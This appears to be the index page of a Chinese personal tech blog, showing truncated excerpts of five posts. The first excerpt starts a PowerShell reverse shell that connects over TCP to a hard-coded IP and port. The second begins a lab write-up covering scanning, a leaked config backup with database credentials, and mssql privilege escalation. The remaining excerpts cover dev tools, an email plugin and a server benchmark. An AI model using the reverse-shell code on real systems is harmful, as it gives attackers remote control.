Loading...
写在开始之前发现了一个纯靠PowerShell就能弹Shell的方式,特地记录一下使用方式原理是调用C#的库,建立TCP连接代码如下$client = New-Object System.Net.Sockets.TCPClient('172.16.1.19', 6666); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535 | ...
写在开始这是一个有后台上传和mssql提权的一个靶机的Write Up过程首先用nmap扫一下这个机器发现开了一个1433端口的mssql和27689端口的http服务器,首先登录这个http服务器看里面的情况。发现是个文件上传下载系统,而且好像是个aspx的服务。用dirsearch扫一下网站发现有个web.config.bak文件,下载下来看看内容拿到一个数据库用户名密码还有数据库名称用...
写在开始这里写一下我在开发过程中用到的一些工具和库工具转换工具XML转C#类的工具网址: https://json2csharp.com/code-converters/xml-to-csharp这是一个在线工具,可以拿来把一个成品的XML文档转换成C#用的映射类库调度Coravel一个零配置的定时任务库和任务调度器,主要是用起来比较简单,不需要配置啥配置文件,适合轻量使用的环境。网址: h...
写在开始今天突然想到换个新的邮件密码,然后试了试能不能用,结果发现现在并不能用,而隔壁的Gitea却能用,就觉得不是很对劲,可能出现了什么问题。解决方法盲猜是最近更新了1.2导致的问题,之前都是测试版,现在是正式版了,可能会出现这种情况,就去网上搜了一下,发现大家好像都有这种问题。于是尝试找了一下能用的邮件发送插件,发现好多插件都不支持( ̄ε(# ̄) 最后找到了这个: https://git...
写在开始最近因为某些原因开了azure的试用账户,顺便测试一下这个最低配置的b1ls机型速度咋样似乎已经凉了好多年的LemonBenchLemonBench Linux System Benchmark Utility Version 20200426 Intl BetaVersion Bench Start Time: 2023-02-25 14:44:33 Bench Finish...